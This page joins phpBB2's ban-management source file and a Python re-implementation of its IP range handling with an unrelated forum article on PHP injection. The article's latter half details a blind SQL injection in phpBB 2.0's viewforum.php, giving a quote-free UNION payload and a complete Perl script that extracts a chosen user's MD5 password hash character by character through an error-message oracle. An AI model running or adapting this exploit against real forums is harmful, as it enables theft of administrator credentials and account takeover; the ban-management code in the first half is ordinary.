How to restrict visitors by IP (phpBB code)

Code:

```php
<?php
/***************************************************************************
 *                            admin_user_ban.php
 *                            -------------------
 *   begin                : Tuesday, Jul 31, 2001
 *   copyright            : (C) 2001 The phpBB Group
 *   email                : support@phpbb.com
 *
 *   $Id: admin_user_ban.php,v 1.21.2.2 2002/05/12 15:57:45 psotfx Exp $
 *
 ***************************************************************************/

/***************************************************************************
 *   This file is part of the phpBB2 port to Nuke 6.0 (c) copyright 2002
 *   by Tom Nitzschner (tom@toms-home.com)
 *
 *   As always, make a backup before messing with anything. All code
 *   released by me is considered sample code only. It may be fully
 *   functional, but you use it at your own risk; if you break it,
 *   you get to fix it too. No warranty is given or implied.
 *
 *   Please post all questions/requests about this port on the forum first,
 *   then on my site. All original header code and copyright messages will
 *   be maintained to give credit where credit is due. If you modify this,
 *   the only requirement is that you also maintain all original copyright
 *   messages. All my work is released under the GNU GENERAL PUBLIC
 *   LICENSE. Please see the README for more information.
 ***************************************************************************/

/***************************************************************************
 *   This program is free software; you can redistribute it and/or modify
 *   it under the terms of the GNU General Public License as published by
 *   the Free Software Foundation; either version 2 of the License, or
 *   (at your option) any later version.
 ***************************************************************************/

define('IN_PHPBB', 1);

if ( !empty($setmodules) )
{
    $filename = basename(__FILE__);
    $module['Users']['Ban_Management'] = $filename;
    return;
}

//
// Load default header
//
$phpbb_root_path = './../';
require($phpbb_root_path . 'extension.inc');
require('./pagestart.' . $phpEx);

//
// Start program
//
if ( isset($HTTP_POST_VARS['submit']) )
{
    $user_bansql = '';
    $email_bansql = '';
    $ip_bansql = '';

    $user_list = array();
    if ( !empty($HTTP_POST_VARS['username']) )
    {
        $this_userdata = get_userdata($HTTP_POST_VARS['username']);
        if( !$this_userdata )
        {
            message_die(GENERAL_MESSAGE, $lang['No_user_id_specified'] );
        }

        $user_list[] = $this_userdata['user_id'];
    }

    $ip_list = array();
    if ( isset($HTTP_POST_VARS['ban_ip']) )
    {
        $ip_list_temp = explode(',', $HTTP_POST_VARS['ban_ip']);

        for($i = 0; $i < count($ip_list_temp); $i++)
        {
            // Form 1: an explicit range "a.b.c.d - e.f.g.h"
            if ( preg_match('/^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})[ ]*\-[ ]*([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$/', trim($ip_list_temp[$i]), $ip_range_explode) )
            {
                //
                // Don't ask about all this, just don't ask ... ! (why?)
                //
                // The nested loops walk the range octet by octet; whenever a
                // whole sub-block (octet 0 .. 254) is covered they emit a single
                // wildcard entry using 255 in the remaining positions instead of
                // enumerating every host.
                //
                $ip_1_counter = $ip_range_explode[1];
                $ip_1_end = $ip_range_explode[5];

                while ( $ip_1_counter <= $ip_1_end )
                {
                    $ip_2_counter = ( $ip_1_counter == $ip_range_explode[1] ) ? $ip_range_explode[2] : 0;
                    $ip_2_end = ( $ip_1_counter < $ip_1_end ) ? 254 : $ip_range_explode[6];

                    if ( $ip_2_counter == 0 && $ip_2_end == 254 )
                    {
                        $ip_2_counter = 255;
                        $ip_2_fragment = 255;

                        $ip_list[] = encode_ip("$ip_1_counter.255.255.255");
                    }

                    while ( $ip_2_counter <= $ip_2_end )
                    {
                        $ip_3_counter = ( $ip_2_counter == $ip_range_explode[2] && $ip_1_counter == $ip_range_explode[1] ) ? $ip_range_explode[3] : 0;
                        $ip_3_end = ( $ip_2_counter < $ip_2_end || $ip_1_counter < $ip_1_end ) ? 254 : $ip_range_explode[7];

                        if ( $ip_3_counter == 0 && $ip_3_end == 254 )
                        {
                            $ip_3_counter = 255;
                            $ip_3_fragment = 255;

                            $ip_list[] = encode_ip("$ip_1_counter.$ip_2_counter.255.255");
                        }

                        while ( $ip_3_counter <= $ip_3_end )
                        {
                            $ip_4_counter = ( $ip_3_counter == $ip_range_explode[3] && $ip_2_counter == $ip_range_explode[2] && $ip_1_counter == $ip_range_explode[1] ) ? $ip_range_explode[4] : 0;
                            $ip_4_end = ( $ip_3_counter < $ip_3_end || $ip_2_counter < $ip_2_end ) ? 254 : $ip_range_explode[8];

                            if ( $ip_4_counter == 0 && $ip_4_end == 254 )
                            {
                                $ip_4_counter = 255;
                                $ip_4_fragment = 255;

                                $ip_list[] = encode_ip("$ip_1_counter.$ip_2_counter.$ip_3_counter.255");
                            }

                            while ( $ip_4_counter <= $ip_4_end )
                            {
                                $ip_list[] = encode_ip("$ip_1_counter.$ip_2_counter.$ip_3_counter.$ip_4_counter");
                                $ip_4_counter++;
                            }
                            $ip_3_counter++;
                        }
                        $ip_2_counter++;
                    }
                    $ip_1_counter++;
                }
            }
            // Form 2: a hostname, resolved to all of its addresses
            else if ( preg_match('/^([\w\-_]\.?){2,}$/is', trim($ip_list_temp[$i])) )
            {
                $ip = gethostbynamel(trim($ip_list_temp[$i]));

                for($j = 0; $j < count($ip); $j++)
                {
                    if ( !empty($ip[$j]) )
                    {
                        $ip_list[] = encode_ip($ip[$j]);
                    }
                }
            }
            // Form 3: "a.*.*.*" style wildcard; * is stored as 255
            else if ( preg_match('/^([0-9]{1,3})\.([0-9\*]{1,3})\.([0-9\*]{1,3})\.([0-9\*]{1,3})$/', trim($ip_list_temp[$i])) )
            {
                $ip_list[] = encode_ip(str_replace('*', '255', trim($ip_list_temp[$i])));
            }
        }
    }

    $email_list = array();
    if ( isset($HTTP_POST_VARS['ban_email']) )
    {
        $email_list_temp = explode(',', $HTTP_POST_VARS['ban_email']);

        for($i = 0; $i < count($email_list_temp); $i++)
        {
            //
            // This ereg match is based on one by php@unreelpro.com
            // contained in the annotated php manual at php.com (ereg
            // section)
            //
            if ( eregi('^(([[:alnum:]\*]+([-_.][[:alnum:]\*]+)*\.?)|(\*))@([[:alnum:]]+([-_]?[[:alnum:]]+)*\.){1,3}([[:alnum:]]{2,6})$', trim($email_list_temp[$i])) )
            {
                $email_list[] = trim($email_list_temp[$i]);
            }
        }
    }

    $sql = "SELECT *
        FROM " . BANLIST_TABLE;
    if ( !($result = $db->sql_query($sql)) )
    {
        message_die(GENERAL_ERROR, "Couldn't obtain banlist information", "", __LINE__, __FILE__, $sql);
    }

    $current_banlist = $db->sql_fetchrowset($result);
    $db->sql_freeresult($result);

    $kill_session_sql = '';
    for($i = 0; $i < count($user_list); $i++)
    {
        $in_banlist = false;
        for($j = 0; $j < count($current_banlist); $j++)
        {
            if ( $user_list[$i] == $current_banlist[$j]['ban_userid'] )
            {
                $in_banlist = true;
            }
        }

        if ( !$in_banlist )
        {
            $kill_session_sql .= ( ( $kill_session_sql != '' ) ? ' OR ' : '' ) . "session_user_id = " . $user_list[$i];

            $sql = "INSERT INTO " . BANLIST_TABLE . " (ban_userid)
                VALUES (" . $user_list[$i] . ")";
            if ( !$db->sql_query($sql) )
            {
                message_die(GENERAL_ERROR, "Couldn't insert ban_userid info into database", "", __LINE__, __FILE__, $sql);
            }
        }
    }

    for($i = 0; $i < count($ip_list); $i++)
    {
        $in_banlist = false;
        for($j = 0; $j < count($current_banlist); $j++)
        {
            if ( $ip_list[$i] == $current_banlist[$j]['ban_ip'] )
            {
                $in_banlist = true;
            }
        }

        if ( !$in_banlist )
        {
            // A wildcard octet is stored as "ff"; turn it into a LIKE "%" so the
            // matching live sessions can be removed as well
            if ( preg_match('/(ff\.)|(\.ff)/is', chunk_split($ip_list[$i], 2, '.')) )
            {
                $kill_ip_sql = "session_ip LIKE '" . str_replace('.', '', preg_replace('/(ff\.)|(\.ff)/is', '%', chunk_split($ip_list[$i], 2, "."))) . "'";
            }
            else
            {
                $kill_ip_sql = "session_ip = '" . $ip_list[$i] . "'";
            }

            $kill_session_sql .= ( ( $kill_session_sql != '' ) ? ' OR ' : '' ) . $kill_ip_sql;

            $sql = "INSERT INTO " . BANLIST_TABLE . " (ban_ip)
                VALUES ('" . $ip_list[$i] . "')";
            if ( !$db->sql_query($sql) )
            {
                message_die(GENERAL_ERROR, "Couldn't insert ban_ip info into database", "", __LINE__, __FILE__, $sql);
            }
        }
    }

    //
    // Now we'll delete all entries from the session table with any of the banned
    // user or IP info just entered into the ban table ... this will force a session
    // initialisation resulting in an instant ban
    //
    if ( $kill_session_sql != '' )
    {
        $sql = "DELETE FROM " . SESSIONS_TABLE . "
            WHERE $kill_session_sql";
        if ( !$db->sql_query($sql) )
        {
            message_die(GENERAL_ERROR, "Couldn't delete banned sessions from database", "", __LINE__, __FILE__, $sql);
        }
    }

    for($i = 0; $i < count($email_list); $i++)
    {
        $in_banlist = false;
        for($j = 0; $j < count($current_banlist); $j++)
        {
            if ( $email_list[$i] == $current_banlist[$j]['ban_email'] )
            {
                $in_banlist = true;
            }
        }

        if ( !$in_banlist )
        {
            $sql = "INSERT INTO " . BANLIST_TABLE . " (ban_email)
                VALUES ('" . str_replace("\'", "''", $email_list[$i]) . "')";
            if ( !$db->sql_query($sql) )
            {
                message_die(GENERAL_ERROR, "Couldn't insert ban_email info into database", "", __LINE__, __FILE__, $sql);
            }
        }
    }

    $where_sql = '';

    if ( isset($HTTP_POST_VARS['unban_user']) )
    {
        $user_list = $HTTP_POST_VARS['unban_user'];

        for($i = 0; $i < count($user_list); $i++)
        {
            if ( $user_list[$i] != -1 )
            {
                $where_sql .= ( ( $where_sql != '' ) ? ', ' : '' ) . $user_list[$i];
            }
        }
    }

    if ( isset($HTTP_POST_VARS['unban_ip']) )
    {
        $ip_list = $HTTP_POST_VARS['unban_ip'];

        for($i = 0; $i < count($ip_list); $i++)
        {
            if ( $ip_list[$i] != -1 )
            {
                $where_sql .= ( ( $where_sql != '' ) ? ', ' : '' ) . $ip_list[$i];
            }
        }
    }

    if ( isset($HTTP_POST_VARS['unban_email']) )
    {
        $email_list = $HTTP_POST_VARS['unban_email'];

        for($i = 0; $i < count($email_list); $i++)
        {
            if ( $email_list[$i] != -1 )
            {
                $where_sql .= ( ( $where_sql != '' ) ? ', ' : '' ) . $email_list[$i];
            }
        }
    }

    if ( $where_sql != '' )
    {
        $sql = "DELETE FROM " . BANLIST_TABLE . "
            WHERE ban_id IN ($where_sql)";
        if ( !$db->sql_query($sql) )
        {
            message_die(GENERAL_ERROR, "Couldn't delete ban info from database", "", __LINE__, __FILE__, $sql);
        }
    }

    $message = $lang['Ban_update_sucessful'] . '<br /><br />' . sprintf($lang['Click_return_banadmin'], '<a href="' . append_sid("admin_user_ban.$phpEx") . '">', '</a>') . '<br /><br />' . sprintf($lang['Click_return_admin_index'], '<a href="' . append_sid("index.$phpEx?pane=right") . '">', '</a>');

    message_die(GENERAL_MESSAGE, $message);
}
else
{
    $template->set_filenames(array(
        'body' => 'admin/user_ban_body.tpl')
    );

    $template->assign_vars(array(
        'L_BAN_TITLE' => $lang['Ban_control'],
        'L_BAN_EXPLAIN' => $lang['Ban_explain'],
        'L_BAN_EXPLAIN_WARN' => $lang['Ban_explain_warn'],
        'L_IP_OR_HOSTNAME' => $lang['IP_hostname'],
        'L_EMAIL_ADDRESS' => $lang['Email_address'],
        'L_SUBMIT' => $lang['Submit'],
        'L_RESET' => $lang['Reset'],

        'S_BANLIST_ACTION' => append_sid("admin_user_ban.$phpEx"))
    );

    $template->assign_vars(array(
        'L_BAN_USER' => $lang['Ban_username'],
        'L_BAN_USER_EXPLAIN' => $lang['Ban_username_explain'],
        'L_BAN_IP' => $lang['Ban_IP'],
        'L_BAN_IP_EXPLAIN' => $lang['Ban_IP_explain'],
        'L_BAN_EMAIL' => $lang['Ban_email'],
        'L_BAN_EMAIL_EXPLAIN' => $lang['Ban_email_explain'])
    );

    $userban_count = 0;
    $ipban_count = 0;
    $emailban_count = 0;

    $sql = "SELECT b.ban_id, u.user_id, u.username
        FROM " . BANLIST_TABLE . " b, " . USERS_TABLE . " u
        WHERE u.user_id = b.ban_userid
            AND b.ban_userid <> 0
            AND u.user_id <> " . ANONYMOUS . "
        ORDER BY u.user_id ASC";
    if ( !($result = $db->sql_query($sql)) )
    {
        message_die(GENERAL_ERROR, 'Could not select current user_id ban list', '', __LINE__, __FILE__, $sql);
    }

    $user_list = $db->sql_fetchrowset($result);
    $db->sql_freeresult($result);

    $select_userlist = '';
    for($i = 0; $i < count($user_list); $i++)
    {
        $select_userlist .= '<option value="' . $user_list[$i]['ban_id'] . '">' . $user_list[$i]['username'] . '</option>';
        $userban_count++;
    }

    if( $select_userlist == '' )
    {
        $select_userlist = '<option value="-1">' . $lang['No_banned_users'] . '</option>';
    }

    $select_userlist = '<select name="unban_user[]" multiple="multiple" size="5">' . $select_userlist . '</select>';

    $sql = "SELECT ban_id, ban_ip, ban_email
        FROM " . BANLIST_TABLE;
    if ( !($result = $db->sql_query($sql)) )
    {
        message_die(GENERAL_ERROR, 'Could not select current ip ban list', '', __LINE__, __FILE__, $sql);
    }

    $banlist = $db->sql_fetchrowset($result);
    $db->sql_freeresult($result);

    $select_iplist = '';
    $select_emaillist = '';
    for($i = 0; $i < count($banlist); $i++)
    {
        $ban_id = $banlist[$i]['ban_id'];

        if ( !empty($banlist[$i]['ban_ip']) )
        {
            // 255 is the stored wildcard, so it is shown as * again
            $ban_ip = str_replace('255', '*', decode_ip($banlist[$i]['ban_ip']));
            $select_iplist .= '<option value="' . $ban_id . '">' . $ban_ip . '</option>';
            $ipban_count++;
        }
        else if ( !empty($banlist[$i]['ban_email']) )
        {
            $ban_email = $banlist[$i]['ban_email'];
            $select_emaillist .= '<option value="' . $ban_id . '">' . $ban_email . '</option>';
            $emailban_count++;
        }
    }

    if ( $select_iplist == '' )
    {
        $select_iplist = '<option value="-1">' . $lang['No_banned_ip'] . '</option>';
    }

    if ( $select_emaillist == '' )
    {
        $select_emaillist = '<option value="-1">' . $lang['No_banned_email'] . '</option>';
    }

    $select_iplist = '<select name="unban_ip[]" multiple="multiple" size="5">' . $select_iplist . '</select>';
    $select_emaillist = '<select name="unban_email[]" multiple="multiple" size="5">' . $select_emaillist . '</select>';

    $template->assign_vars(array(
        'L_UNBAN_USER' => $lang['Unban_username'],
        'L_UNBAN_USER_EXPLAIN' => $lang['Unban_username_explain'],
        'L_UNBAN_IP' => $lang['Unban_IP'],
        'L_UNBAN_IP_EXPLAIN' => $lang['Unban_IP_explain'],
        'L_UNBAN_EMAIL' => $lang['Unban_email'],
        'L_UNBAN_EMAIL_EXPLAIN' => $lang['Unban_email_explain'],
        'L_USERNAME' => $lang['Username'],
        'L_LOOK_UP' => $lang['Look_up_User'],
        'L_FIND_USERNAME' => $lang['Find_username'],

        'U_SEARCH_USER' => append_sid("search.$phpEx?mode=searchuser&popup=1&menu=1"),

        'S_UNBAN_USERLIST_SELECT' => $select_userlist,
        'S_UNBAN_IPLIST_SELECT' => $select_iplist,
        'S_UNBAN_EMAILLIST_SELECT' => $select_emaillist,
        'S_BAN_ACTION' => append_sid("admin_user_ban.$phpEx"))
    );
}

$template->pparse('body');

include('./page_footer_admin.'.$phpEx);

?>
```
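The nested while-loops are the hardest part of the file to read. The following is an added example, written for this page and not phpBB's own code, that redoes the same IP handling in Python: encode_ip()/decode_ip() in the 8-hex-character storage format, expansion of an "a.b.c.d - e.f.g.h" range into /8, /16 and /24 wildcard entries (octet 255, stored as "ff") plus single hosts, the "10.*.*.*" shorthand, and the LIKE predicate that evicts live sessions matching a wildcard entry. It generalises the page's loops: it emits the fewest wildcard entries that exactly cover the range, whereas phpBB's loops only collapse a sub-block when its end octet is 254. The hostname branch (gethostbynamel) is left out so that the example runs offline; the admin input in the `__main__` block is constructed.

```python
"""Added example, not phpBB's code: the ban-list IP handling of
admin_user_ban.php re-done in Python.  encode_ip()/decode_ip() follow the
8-hex-character storage format; expand_range() covers an a.b.c.d - e.f.g.h
range with /8, /16 and /24 wildcard entries (octet 255 -> 'ff') plus single
hosts; session_ip_predicate() rebuilds the LIKE clause that evicts sessions
matching a wildcard entry.  Hostnames are not resolved here (phpBB calls
gethostbynamel), so the example runs offline."""
import ipaddress
import re

RANGE_RE = re.compile(r'^(\d{1,3}(?:\.\d{1,3}){3})\s*-\s*(\d{1,3}(?:\.\d{1,3}){3})$')
WILDCARD_RE = re.compile(r'^\d{1,3}(?:\.[0-9*]{1,3}){3}$')   # "10.*.*.*" form


def encode_ip(dotted):
    """'192.168.1.2' -> 'c0a80102'; rejects anything that is not four octets."""
    octets = [int(o) for o in dotted.split('.')]
    if len(octets) != 4 or any(not 0 <= o <= 255 for o in octets):
        raise ValueError('bad IPv4 address: %r' % dotted)
    return ''.join('%02x' % o for o in octets)


def decode_ip(hexip):
    """'c0a80102' -> '192.168.1.2' (a wildcard 'ff' comes back as 255)."""
    return '.'.join(str(int(hexip[i:i + 2], 16)) for i in range(0, 8, 2))


def expand_range(start, end):
    """Greedy cover of [start, end]: at each position take the largest aligned
    /8, /16 or /24 block that still fits and emit it as one wildcard entry,
    otherwise emit the single host.  Exact coverage with the fewest entries."""
    cur, hi = int(ipaddress.IPv4Address(start)), int(ipaddress.IPv4Address(end))
    if cur > hi:
        raise ValueError('range start is above range end')
    entries = []
    while cur <= hi:
        for bits in (24, 16, 8):               # /8, /16, /24 in that order
            size = 1 << bits
            if cur % size == 0 and cur + size - 1 <= hi:
                keep = 4 - bits // 8           # leading octets that stay fixed
                octets = str(ipaddress.IPv4Address(cur)).split('.')[:keep]
                entries.append(encode_ip('.'.join(octets + ['255'] * (4 - keep))))
                cur += size
                break
        else:
            entries.append(encode_ip(str(ipaddress.IPv4Address(cur))))
            cur += 1
    return entries


def parse_ban_ip_field(field):
    """The comma-separated admin input, handled as the ban form does:
    ranges are expanded, '*' becomes 255, hostnames are skipped here."""
    entries = []
    for item in (s.strip() for s in field.split(',')):
        m = RANGE_RE.match(item)
        try:
            if m:
                entries.extend(expand_range(m.group(1), m.group(2)))
            elif WILDCARD_RE.match(item):
                entries.append(encode_ip(item.replace('*', '255')))
        except ValueError:
            continue                           # malformed octet (e.g. "**"): drop it
    return entries


def session_ip_predicate(hexip):
    """phpBB splits the stored value into octet pairs, turns each 'ff' into
    '%' and uses LIKE; exact entries use equality.  The value is always eight
    hex characters, so concatenating it into SQL carries nothing else."""
    octets = [hexip[i:i + 2] for i in range(0, 8, 2)]
    if 'ff' in octets:
        return "session_ip LIKE '%s'" % ''.join('%' if o == 'ff' else o for o in octets)
    return "session_ip = '%s'" % hexip


if __name__ == '__main__':
    # Constructed admin input: one range, one wildcard
    for e in parse_ban_ip_field('192.168.1.250 - 192.168.3.5, 10.*.*.*'):
        print(decode_ip(e).replace('255', '*'), '=>', session_ip_predicate(e))
```

Two caveats follow directly from the encoding: a wildcard octet and a real .255 octet are both stored as "ff", which is why the unban list above displays every 255 as "*" and why an entry such as 192.168.2.255 cannot be banned as a single host; and because each stored value is exactly eight hex characters, the concatenated session_ip predicate can only ever contain hex digits and "%".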


PHP injection example

It is hard to find a complete article about PHP injection with exploit code online, so I spent a few weeks chewing through MySQL and PHP myself. Here is what I learned; I hope it gets a discussion going.

Everyone is very familiar with ASP injection by now. PHP injection is harder than ASP: PHP's magic_quotes_gpc option is a real headache, since no quote characters may appear in the injection, and PHP is mostly paired with MySQL, whose functional limitations, seen from another angle, prevent SQL injection to a certain extent. I will give one concrete example here, using phpBB 2.0:
In viewforum.php there is one variable that is not filtered:

```php
if ( isset($HTTP_GET_VARS[POST_FORUM_URL]) || isset($HTTP_POST_VARS[POST_FORUM_URL]) )
{
    // the "f" parameter is cast to an integer ...
    $forum_id = ( isset($HTTP_GET_VARS[POST_FORUM_URL]) ) ? intval($HTTP_GET_VARS[POST_FORUM_URL]) : intval($HTTP_POST_VARS[POST_FORUM_URL]);
}
else if ( isset($HTTP_GET_VARS['forum']))
{
    // ... but the legacy "forum" parameter is taken as-is
    $forum_id = $HTTP_GET_VARS['forum'];
}
else
{
    $forum_id = '';
}
```
That is the `forum` parameter, and a little further down it goes straight into a query:

```php
if ( !empty($forum_id) )
{
    $sql = "SELECT *
        FROM " . FORUMS_TABLE . "
        WHERE forum_id = $forum_id";
    if ( !($result = $db->sql_query($sql)) )
    {
        message_die(GENERAL_ERROR, 'Could not obtain forums information', '', __LINE__, __FILE__, $sql);
    }
}
else
{
    message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}
```


If this were ASP, I am sure many people would already know how to inject it. If the forum that forum_id names does not exist, the query returns no row and viewforum.php stops with Forum_not_exist (a query that fails outright stops earlier, with Could not obtain forums information); either way the code below is never reached:

```php
//
// If the query doesn't return any rows this isn't a valid forum. Inform
// the user.
//
if ( !($forum_row = $db->sql_fetchrow($result)) )
{
    message_die(GENERAL_MESSAGE, 'Forum_not_exist');
}

//
// Start session management
//
$userdata = session_pagestart($user_ip, $forum_id);   // **** the line discussed below
```

The key is the line marked with asterisks. It calls session_pagestart($user_ip, $thispage_id), a function defined in session.php. The code is too long to reproduce in full; anyone interested can read it themselves. What matters is that this function in turn calls session_begin(), as session_begin($user_id, $user_ip, $thispage_id, TRUE), also defined in that file, which contains the following code:
```php
$sql = "UPDATE " . SESSIONS_TABLE . "
    SET session_user_id = $user_id, session_start = $current_time, session_time = $current_time, session_page = $page_id, session_logged_in = $login
    WHERE session_id = '" . $session_id . "'
        AND session_ip = '$user_ip'";
if ( !($result = $db->sql_query($sql)) || !$db->sql_affectedrows() )
{
    $session_id = md5(uniqid($user_ip));

    $sql = "INSERT INTO " . SESSIONS_TABLE . "
        (session_id, session_user_id, session_start, session_time, session_ip, session_page, session_logged_in)
        VALUES ('$session_id', $user_id, $current_time, $current_time, '$user_ip', $page_id, $login)";
    if ( !($result = $db->sql_query($sql)) )
    {
        message_die(CRITICAL_ERROR, 'Error creating new session : session_begin', '', __LINE__, __FILE__, $sql);
    }
}
```

Here session_page is defined in MySQL as an integer column, and its value is $page_id, which is $forum_id. $forum_id is spliced into the UPDATE and the INSERT unquoted, so if it is anything other than an integer the query fails and phpBB dies with Error creating new session : session_begin. The value given to $forum_id is therefore what matters, and I set it to:

-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=2%20and%20ord(substring(user_password,1,1))=57

No quotes! Although it names a forum that does not exist, the query result is not necessarily empty: the UNION asks whether the ASCII code of the first character of the password hash of user_id 2 is 57 (the digit 9). If it is, the forum query in the first snippet returns a row, execution reaches the problematic session_pagestart(), the non-integer value breaks the session query, and the page shows Error creating new session : session_begin, which tells you the first character is right. The remaining positions work the same way.

Without that error message I think it would be hard to tell whether the injection had worked even when it had; error messages are a great help. That ends the analysis. Below is a test script; with small changes it can be adapted to other cases of guessing an MD5 password hash in the same way. I used the English-language response as the match condition; for Chinese or other language packs just change the string it looks for.

```perl
#!/usr/bin/perl
# phpbb viewforum.php exp - code by pinkeyes, www.icehack.com
use strict;
use warnings;
use HTTP::Request::Common;
use HTTP::Response;
use LWP::UserAgent;

my $ua = new LWP::UserAgent;

print " ***********************\n";
print " phpbb viewforum.php exp\n";
print " code by pinkeyes\n";
print " www.icehack.com\n";
print " ************************\n";
print "please enter the weak file's url:\n";
print "e.g. \n";
my $adr = <STDIN>;
chomp($adr);
print "please enter the user_id that you want to crack\n";
my $u = <STDIN>;
chomp($u);
print "work starting,please wait!\n";

# an MD5 hash is 32 lower-case hex digits: '0'-'9' (48..57) and 'a'-'f' (97..102)
my @pink = (48..57);
@pink = (@pink, 97..102);

my $pwd = '';
for (my $j = 1; $j <= 32; $j++) {
    for (my $i = 0; $i < @pink; $i++) {
        # 22 columns to match phpbb_forums; no quote characters anywhere
        my $url = $adr . "?forum=-1%20union%20select%201,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20phpbb_users%20where%20user_id=$u%20and%20ord(substring(user_password,$j,1))=$pink[$i]";
        my $request = HTTP::Request->new('GET', "$url");
        my $response = $ua->request($request);

        if ($response->is_success) {
            # the CRITICAL_ERROR page is the "true" branch of the oracle
            if ($response->content =~ /Error creating new session/) {
                $pwd .= chr($pink[$i]);
                print "$pwd\n";
            }
        }
    }
}
if ($pwd ne "") {
    print "successfully,The password is $pwd,good luck\n";
} else {
    print "bad luck,work failed!\n";
}
```
